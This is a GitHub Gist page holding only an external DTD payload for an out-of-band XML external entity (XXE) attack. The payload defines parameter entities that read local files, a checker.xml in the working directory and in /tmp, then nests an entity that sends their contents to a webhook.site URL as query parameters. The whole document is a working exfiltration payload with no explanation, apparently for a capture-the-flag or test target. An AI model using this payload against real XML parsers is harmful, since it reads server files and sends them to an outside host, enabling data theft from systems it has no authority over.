Skip to content

Instantly share code, notes, and snippets.

@nangsontay
nangsontay / fuck.dtd
Last active November 7, 2025 07:48
fuck.xml
<!ENTITY % file1 SYSTEM "file:///proc/self/cwd/checker.xml">
<!ENTITY % file2 SYSTEM "file://./checker.xml">
<!ENTITY % file3 SYSTEM "file:///tmp/checker.xml">
<!ENTITY % int "<!ENTITY &#x25; send SYSTEM 'https://webhook.site/f3c98a4b-1da6-409f-8dbb-ecbdb788cb50?cwd=%file1;&relative=%file2;&tmp=%file3;'>">
%int;
%send;